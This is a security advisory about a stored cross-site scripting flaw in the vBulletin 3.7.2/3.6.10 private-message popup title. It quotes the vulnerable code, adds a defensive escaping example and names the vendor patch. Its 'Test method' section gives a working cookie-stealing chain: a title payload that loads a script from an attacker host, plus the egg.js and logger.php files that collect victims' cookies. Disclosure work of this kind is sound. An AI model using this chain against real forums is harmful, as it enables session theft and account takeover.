vBulletin $newpm[title] Parameter Cross-Site Scripting Vulnerability
Published: 2008-08-20
Updated: 2008-08-22
Affected systems:
VBulletin VBulletin 3.7.2 PL1
VBulletin VBulletin 3.6.10 PL3
Unaffected systems:
VBulletin VBulletin 3.7.2 PL2
VBulletin VBulletin 3.6.10 PL4
Description:
BUGTRAQ ID: 30777
vBulletin is an open-source PHP forum application.
If the "Show New Private Message Notification Pop-Up" option is enabled on a vBulletin forum, the title of a private message is stored without being properly filtered on input. This allows arbitrary HTML and script code to be injected, which executes when a user views the malicious data.
The vulnerable code fragment is as follows:
/-----------
<!--
// script to show new private message popup
// [PRIVATE_MESSAGE_TITLE] is replaced with $newpm[title], which is only escaped as a JS string (see global.php below)
if (confirm("You have a new private message.\n\nSender: [SENDER_USERNAME]\nTitle: '[PRIVATE_MESSAGE_TITLE]'\n\nClick OK to view it, or cancel to hide this prompt."))
{
    // Output when OK is clicked
    if (confirm("Open the message in a new window?\n\n(Press cancel to open in the current window.)"))
    {
        var winobj = window.open("private.php?do=showpm&pmid=[PRIVATE_MESSAGE_ID]", "pmnew", "statusbar=yes,menubar=yes,scrollbars=yes,toolbar=yes,location=yes,directories=yes,resizable=yes,top=50,left=50");
        if (winobj == null)
        {
            alert("Unable to open a new browser window,\n This might be due to a 'popup blocker'");
        }
    }
    else
    {
        window.location = "private.php?do=showpm&pmid=[PRIVATE_MESSAGE_ID]";
    }
}
// end pm popup script
//-->
-----------/
Before that, global.php drops the filtering of the $newpm[title] variable used in install/vbulletin-style.xml and only performs slash escaping:
/-----------
// #############################################################################
// get new private message popup
$shownewpm = false;
if ($vbulletin->userinfo['pmpopup'] == 2 AND $vbulletin->options['checknewpm'] AND $vbulletin->userinfo['userid'] AND !defined('NOPMPOPUP'))
{
    $userdm =& datamanager_init('User', $vbulletin, ERRTYPE_SILENT);
    $userdm->set_existing($vbulletin->userinfo);
    $userdm->set('pmpopup', 1);
    $userdm->save(true, 'pmpopup'); // 'pmpopup' tells db_update to issue a shutdownquery of the same name
    unset($userdm);

    if (THIS_SCRIPT != 'private' AND THIS_SCRIPT != 'login')
    {
        $newpm = $db->query_first("
            SELECT pm.pmid, title, fromusername
            FROM " . TABLE_PREFIX . "pmtext AS pmtext
            LEFT JOIN " . TABLE_PREFIX . "pm AS pm USING(pmtextid)
            WHERE pm.userid = " . $vbulletin->userinfo['userid'] . "
                AND pm.folderid = 0
            ORDER BY dateline DESC
            LIMIT 1
        ");
        // JS string escaping only: HTML-significant characters such as '<', '>' and '/' pass through untouched
        $newpm['username'] = addslashes_js(unhtmlspecialchars($newpm['fromusername'], true), '"');
        $newpm['title'] = addslashes_js(unhtmlspecialchars($newpm['title'], true), '"');
        $shownewpm = true;
    }
}
-----------/
This allows cross-site scripting attacks.
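As an added illustration (not vBulletin's code), the following Node.js snippet emulates the two escaping choices above under assumed function names: addslashesJs mirrors what addslashes_js does to the title, escapeForScriptString is a context-aware replacement that hex-encodes every character the HTML parser could act on, and scriptContextIntact is a simple defender-side check that a rendered page still contains exactly one script element. The sample title is constructed.

```javascript
// Added example (not vBulletin's code). Function names and the sample title are
// assumptions constructed for this illustration.

// Emulates vBulletin's addslashes_js($s, '"'): it escapes the quote, the backslash
// and line breaks so the value survives as a JS string literal, and nothing else.
function addslashesJs(s) {
  return s.replace(/\\/g, "\\\\").replace(/"/g, '\\"')
          .replace(/\r/g, "\\r").replace(/\n/g, "\\n");
}

// Context-aware escaper for data placed in a JS string literal inside <script>:
// every character outside a small safe set is emitted as \xHH or \uHHHH, so the
// HTML parser never sees a raw '<', '/', '>' or '-' and cannot find '</script'
// or '-->' inside the value. The JS lexer decodes the escapes back to the text.
function escapeForScriptString(s) {
  return s.replace(/[^A-Za-z0-9 ,.:;_]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Shortened form of the popup template from the advisory, rendered with a chosen
// escaper in the position of [PRIVATE_MESSAGE_TITLE].
function renderPopup(title, escaper) {
  return '<script type="text/javascript">\n<!--\n' +
    'if (confirm("You have a new private message.\\n\\nTitle: \'' +
    escaper(title) + '\'"))\n{ window.location = "private.php?do=showpm"; }\n' +
    '//-->\n</script>';
}

// Defender-side check on the rendered markup: exactly one <script ...> and one
// </script> must be present. Any extra occurrence means the title escaped the
// JS string context and is being parsed as HTML.
function scriptContextIntact(html) {
  const opens = (html.match(/<script/gi) || []).length;
  const closes = (html.match(/<\/script/gi) || []).length;
  return opens === 1 && closes === 1;
}

// Constructed title shaped like the advisory's payload, with harmless markup.
const SAMPLE_TITLE = 'hi --></script><b>injected markup</b><script><!--';

if (typeof require !== "undefined" && require.main === module) {
  console.log("weak escaper, context intact:", scriptContextIntact(renderPopup(SAMPLE_TITLE, addslashesJs)));
  console.log("hardened escaper, context intact:", scriptContextIntact(renderPopup(SAMPLE_TITLE, escapeForScriptString)));
}
```

The same check can be run over pages captured from a forum to confirm a deployed template no longer lets a stored title close the script element.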
<*Source: Federico Muttis
Links: http://secunia.com/advisories/31552/
http://www.vbulletin.com/forum/showthread.php?t=282133
http://marc.info/?l=bugtraq&m=121933258013788&w=2
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided only for security research and teaching. Users bear the risk themselves!
--></script><script src="http://attacker/vbStealer/egg.js"></script><!--
where the egg.js script is:
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==
//
// Using the first method described in
// http://www.securityfocus.com/archive/107/308433
//
// To bypass HttpOnly cookie restrictions - Works in IE 6 and lower
var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
XmlHttp.open("GET","http://victim/vbStealer/logger.php",false);
XmlHttp.setRequestHeader("Host","attacker");
XmlHttp.send();
and the logger.php script file is:
<?php
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==
$all_cookies = "";
foreach ($_COOKIE as $cookie_name => $cookie_value) {
    $all_cookies .= "$cookie_name=$cookie_value, ";
}
$all_cookies = rtrim($all_cookies, ", "); // rtrim returns the trimmed string; the original discarded the result
file_put_contents("iplog.txt", "COOKIES: " . $all_cookies . "\n", FILE_APPEND);
?>
Recommendation:
Vendor patch:
VBulletin
---------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's home page:
http://www.vbulletin.com/